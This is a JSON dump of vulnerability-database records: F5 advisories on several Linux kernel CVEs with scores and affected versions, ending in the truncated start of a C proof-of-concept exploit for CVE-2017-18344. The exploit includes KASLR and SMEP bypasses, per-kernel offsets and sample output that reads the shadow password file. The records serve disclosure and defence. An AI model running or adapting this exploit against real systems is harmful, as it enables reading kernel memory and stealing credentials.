6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2069"], "modified": "2017-07-10T19:21:00", "id": "F5:K44500413", "href": "https://support.f5.com/csp/article/K44500413", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:16", "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-06-17T00:00:00", "type": "f5", "title": "SOL80758444 - Linux kernel vulnerability CVE-2015-8812", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8812"], "modified": "2016-06-17T00:00:00", "id": "SOL80758444", "href": "http://support.f5.com/kb/en-us/solutions/public/k/80/sol80758444.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-06-01T06:00:49", "description": "drivers/infiniband/hw/cxgb3/iwch_cm.c in the Linux kernel before 4.5 does not properly identify error conditions, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via crafted packets. ([CVE-2015-8812)](<https://vulners.com/cve/CVE-2015-8812>)\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-06-17T19:29:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2015-8812", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8812"], "modified": "2016-06-17T19:29:00", "id": "F5:K80758444", "href": "https://support.f5.com/csp/article/K80758444", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T17:23:22", "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-01-22T00:00:00", "type": "f5", "title": "SOL01948202 - Linux kernel vulnerability CVE-2016-0728", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2016-04-26T00:00:00", "id": "SOL01948202", "href": "http://support.f5.com/kb/en-us/solutions/public/k/01/sol01948202.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-06T22:40:01", "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | None | 12.0.0 \n11.4.0 - 11.6.0 | Not vulnerable | None \nBIG-IP AFM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP Analytics | None | 12.0.0 \n11.0.0 - 11.6.0 | Not vulnerable | None \nBIG-IP APM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 12.0.0 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.0.0 - 3.1.1 | Not vulnerable | None \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe* | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 \n3.3.2 - 3.5.1 | Not vulnerable | None \n \n*F5 WebSafe software is not affected by this vulnerability because the Linux kernel does not form part of the product. F5 recommends that customers upgrade the operating system used with the F5 WebSafe Dashboard using the standard OS tools to address CVE-2016-0728.\n\nNone\n\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-01-23T02:26:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2016-0728", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2019-05-08T22:08:00", "id": "F5:K01948202", "href": "https://support.f5.com/csp/article/K01948202", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-08T18:49:01", "description": "*The affected versions ship with vulnerable code; however, the vulnerability is unlikely to be exploited as BIG-IP, BIG-IQ, and EM systems do not load the vhost-net drivers.\n\nRecommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the table does not list any version in the column, or does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "cvss3": {}, "published": "2014-10-16T00:00:00", "type": "f5", "title": "SOL15699 - Linux kernel vulnerability CVE-2014-0131", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.9, "vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0131"], "modified": "2014-10-16T00:00:00", "id": "SOL15699", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15699.html", "cvss": {"score": 2.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2023-06-01T11:57:37", "description": " \n\n\nUse-after-free vulnerability in the skb_segment function in net/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers to obtain sensitive information from kernel memory by leveraging the absence of a certain orphaning operation. ([CVE-2014-0131](<https://vulners.com/cve/CVE-2014-0131>)) \n\n\nImpact \n\n\nAttackers may be able to obtain sensitive information from kernel memory. \n\n", "cvss3": {}, "published": "2014-10-16T17:10:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2014-0131", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.9, "vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0131"], "modified": "2016-01-08T23:19:00", "id": "F5:K15699", "href": "https://support.f5.com/csp/article/K15699", "cvss": {"score": 2.9, "vector": "AV:A/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-14T00:35:03", "description": "\nF5 Product Development has assigned IDs 648215 and 648217 (BIG-IP), ID 649194 (BIG-IQ), ID 649192 (Enterprise Manager), and ID 649568 (F5 iWorkflow) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 \n | Medium | Linux kernel \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP ASM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP DNS | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF1 \n12.1.2 HF1 \n | Medium | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 | None | Medium | Linux kernel \nBIG-IP GTM | 11.4.0 - 11.6.1 \n11.2.1 | 11.5.5 | Medium | Linux kernel \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP PSM | 11.4.0 - 11.4.1 | None | Medium | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | None | Medium | Linux kernel \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | None | Medium | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.1.0 | None | Medium | Linux kernel \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | 4.0.2 | 5.0.0 - 5.1.0 \n4.0.5 - 4.4.0 \n4.0.0 | High | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-11T02:23:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2017-6074", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6074"], "modified": "2018-06-10T02:01:00", "id": "F5:K82508682", "href": "https://support.f5.com/csp/article/K82508682", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.14.7 (Ubuntu 16.04 CentOS 7) - (KASLR SMEP Bypass) Arbitrary File Read", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-08-09T00:00:00", "type": "exploitpack", "title": "Linux Kernel 4.14.7 (Ubuntu 16.04 CentOS 7) - (KASLR SMEP Bypass) Arbitrary File Read", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18344"], "modified": "2018-08-09T00:00:00", "id": "EXPLOITPACK:CC3E0CE0239066A83BA64B22929DBCEC", "href": "", "sourceData": "// A proof-of-concept exploit for CVE-2017-18344.\n// Includes KASLR and SMEP bypasses. No SMAP bypass.\n// No support for 1 GB pages or 5 level page tables.\n// Tested on Ubuntu xenial 4.4.0-116-generic and 4.13.0-38-generic\n// and on CentOS 7 3.10.0-862.9.1.el7.x86_64.\n//\n// gcc pwn.c -o pwn\n//\n// $ ./pwn search 'root:!:'\n// [.] setting up proc reader\n// [~] done\n// [.] checking /proc/cpuinfo\n// [~] looks good\n// [.] setting up timer\n// [~] done\n// [.] finding leak pointer address\n// [+] done: 000000022ca45b60\n// [.] mapping leak pointer page\n// [~] done\n// [.] divide_error: ffffffffad6017b0\n// [.] kernel text: ffffffffacc00000\n// [.] page_offset_base: ffffffffade48a90\n// [.] physmap: ffff8d40c0000000\n// [.] task->mm->pgd: ffffffffade0a000\n// [.] searching [0000000000000000, 00000000f524d000) for 'root:!:':\n// [.] now at 0000000000000000\n// [.] now at 0000000002000000\n// [.] now at 0000000004000000\n// ...\n// [.] now at 000000008c000000\n// [.] now at 000000008e000000\n// [.] now at 0000000090000000\n// [+] found at 0000000090ff3000\n// [+] done\n//\n// $ ./pwn phys 0000000090ff3000 1000 shadow\n// [.] setting up proc reader\n// [~] done\n// [.] checking /proc/cpuinfo\n// [~] looks good\n// [.] setting up timer\n// [~] done\n// [.] finding leak pointer address\n// [+] done: 000000022ca45b60\n// [.] mapping leak pointer page\n// [~] done\n// [.] divide_error: ffffffffad6017b0\n// [.] kernel text: ffffffffacc00000\n// [.] page_offset_base: ffffffffade48a90\n// [.] physmap: ffff8d40c0000000\n// [.] task->mm->pgd: ffffffffade0a000\n// [.] dumping physical memory [0000000090ff3000, 0000000090ff4000):\n// [+] done\n//\n// $ cat shadow \n// root:!:17612:0:99999:7:::\n// daemon:*:17590:0:99999:7:::\n// bin:*:17590:0:99999:7:::\n// ...\n// saned:*:17590:0:99999:7:::\n// usbmux:*:17590:0:99999:7:::\n// user:$1$7lXXXXSv$rvXXXXXXXXXXXXXXXXXhr/:17612:0:99999:7:::\n//\n// Andrey Konovalov <andreyknvl@gmail.com>\n\n#define _GNU_SOURCE\n\n#include <assert.h>\n#include <ctype.h>\n#include <fcntl.h>\n#include <signal.h>\n#include <stdarg.h>\n#include <stdbool.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <time.h>\n#include <unistd.h>\n\n#include <sys/ioctl.h>\n#include <sys/mman.h>\n#include <sys/stat.h>\n#include <sys/sysinfo.h>\n#include <sys/syscall.h>\n#include <sys/types.h>\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define DEBUG 0\n\n// CentOS 7 3.10.0-862.9.1.el7.x86_64\n#define KERNEL_START\t\t\t0xffffffff81000000ul\n#define O_DIVIDE_ERROR\t\t\t(0xffffffff81723a40ul - KERNEL_START)\n#define O_INIT_TASK\t\t\t(0xffffffff81c16480ul - KERNEL_START)\n#define O_INIT_MM\t\t\t(0xffffffff81c914a0ul - KERNEL_START)\n#define O_PAGE_OFFSET_BASE\t\t(0xffffffff81c41440ul - KERNEL_START)\n#define O_TASK_STRUCT_TASKS\t\t1072\n#define O_TASK_STRUCT_MM\t\t1128\n#define O_TASK_STRUCT_PID\t\t1188\n#define O_MM_STRUCT_MMAP\t\t0\n#define O_MM_STRUCT_PGD\t\t\t88\n#define O_VM_AREA_STRUCT_VM_START\t0\n#define O_VM_AREA_STRUCT_VM_END\t\t8\n#define O_VM_AREA_STRUCT_VM_NEXT\t16\n#define O_VM_AREA_STRUCT_VM_FLAGS\t80\n\n#if 0\n// Ubuntu xenial 4.4.0-116-generic\n#define KERNEL_START\t\t\t0xffffffff81000000ul\n#define O_DIVIDE_ERROR\t\t\t(0xffffffff81851240ul - KERNEL_START)\n#define O_INIT_TASK\t\t\t(0xffffffff81e13500ul - KERNEL_START)\n#define O_INIT_MM\t\t\t(0xffffffff81e73c80ul - KERNEL_START)\n#define O_PAGE_OFFSET_BASE\t\t0\n#define O_TASK_STRUCT_TASKS\t\t848\n#define O_TASK_STRUCT_MM\t\t928\n#define O_TASK_STRUCT_PID\t\t1096\n#define O_MM_STRUCT_MMAP\t\t0\n#define O_MM_STRUCT_PGD\t\t\t64\n#define O_VM_AREA_STRUCT_VM_START\t0\n#define O_VM_AREA_STRUCT_VM_END\t\t8\n#define O_VM_AREA_STRUCT_VM_NEXT\t16\n#define O_VM_AREA_STRUCT_VM_FLAGS\t80\n#endif\n\n#if 0\n// Ubuntu xenial 4.13.0-38-generic\n#define KERNEL_START\t\t\t0xffffffff81000000ul\n#define O_DIVIDE_ERROR\t\t\t(0xffffffff81a017b0ul - KERNEL_START)\n#define O_INIT_TASK\t\t\t(0xffffffff82212480ul - KERNEL_START)\n#define O_INIT_MM\t\t\t(0xffffffff82302760ul - KERNEL_START)\n#define O_PAGE_OFFSET_BASE\t\t(0xffffffff82248a90ul - KERNEL_START)\n#define O_TASK_STRUCT_TASKS\t\t2048\n#define O_TASK_STRUCT_MM\t\t2128\n#define O_TASK_STRUCT_PID\t\t2304\n#define O_MM_STRUCT_MMAP\t\t0\n#define O_MM_STRUCT_PGD\t\t\t80\n#define O_VM_AREA_STRUCT_VM_START\t0\n#define O_VM_AREA_STRUCT_VM_END\t\t8\n#define O_VM_AREA_STRUCT_VM_NEXT\t16\n#define O_VM_AREA_STRUCT_VM_FLAGS\t80\n#endif\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#ifndef SYS_memfd_create\n#define SYS_memfd_create\t319\n#endif\n\n#ifndef O_PATH\n#define O_PATH\t\t\t010000000\n#endif\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define PAGE_SHIFT\t\t12\n#define PAGE_SIZE\t\t(1ul << PAGE_SHIFT)\n#define PAGE_MASK\t\t(~(PAGE_SIZE - 1))\n\n#define HUGE_PAGE_SHIFT\t\t21\n#define HUGE_PAGE_SIZE\t\t(1ul << HUGE_PAGE_SHIFT)\n#define HUGE_PAGE_MASK\t\t(~(HUGE_PAGE_SIZE - 1))\n\n#define TASK_SIZE\t\t(1ul << 47)\n#define\tPAGE_OFFSET_BASE\t0xffff880000000000ul\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define LOG_INFO\t1\n#define LOG_DEBUG\t2\n\n#define log(level, format, args...)\t\t\t\t\t\\\n\tdo {\t\t\t\t\t\t\t\t\\\n\t\tif (level == LOG_INFO)\t\t\t\t\t\\\n\t\t\tprintf(format, ## args);\t\t\t\\\n\t\telse\t\t\t\t\t\t\t\\\n\t\t\tfprintf(stderr, format, ## args);\t\t\\\n\t} while(0)\n\n#define info(format, args...) log(LOG_INFO, format, ## args)\n\n#if (DEBUG >= 1)\n#define debug1(format, args...) log(LOG_DEBUG, format, ## args)\n#else\n#define debug1(format, args...)\n#endif\n\n#if (DEBUG >= 2)\n#define debug2(format, args...) log(LOG_DEBUG, format, ## args)\n#else\n#define debug2(format, args...)\n#endif\n\n#define min(x, y) ((x) < (y) ? (x) : (y))\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic void print_chunk(int level, unsigned long src_addr, char *buffer,\n\t\t\t\tint len, int chunk_size) {\n\tint i;\n\n\tassert(len <= chunk_size);\n\n\tlog(level, \"%016lx: \", src_addr);\n\tfor (i = 0; i < len; i++)\n\t\tlog(level, \"%02hx \", (unsigned char)buffer[i]);\n\tfor (i = len; i < chunk_size; i++)\n\t\tlog(level, \" \");\n\n\tlog(level, \" \");\n\n\tfor (i = 0; i < len; i++) {\n\t\tif (isalnum(buffer[i]))\n\t\t\tlog(level, \"%c\", buffer[i]);\n\t\telse\n\t\t\tlog(level, \".\");\n\t}\n\n\tlog(level, \"\\n\");\n}\n\nstatic void print_bytes(int level, unsigned long src_addr, char *buffer,\n\t\t\t\tint len) {\n\tint chunk_size = 16;\n\tassert(chunk_size % 2 == 0);\n\n\tint chunk;\n\tfor (chunk = 0; chunk < len / chunk_size; chunk++)\n\t\tprint_chunk(level, src_addr + chunk * chunk_size,\n\t\t\t&buffer[chunk * chunk_size], chunk_size, chunk_size);\n\n\tint rem = len % chunk_size;\n\tif (rem != 0)\n\t\tprint_chunk(level, src_addr + len - rem,\n\t\t\t&buffer[len - rem], rem, chunk_size);\n}\n\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define MIN_KERNEL_BASE 0xffffffff81000000ul\n#define MAX_KERNEL_BASE 0xffffffffff000000ul\n#define MAX_KERNEL_IMAGE 0x8000000ul // 128 MB\n\n#define MMAP_ADDR_SPAN (MAX_KERNEL_BASE - MIN_KERNEL_BASE + MAX_KERNEL_IMAGE)\n#define MMAP_ADDR_START 0x200000000ul\n#define MMAP_ADDR_END (MMAP_ADDR_START + MMAP_ADDR_SPAN)\n\n#define OPTIMAL_PTR_OFFSET 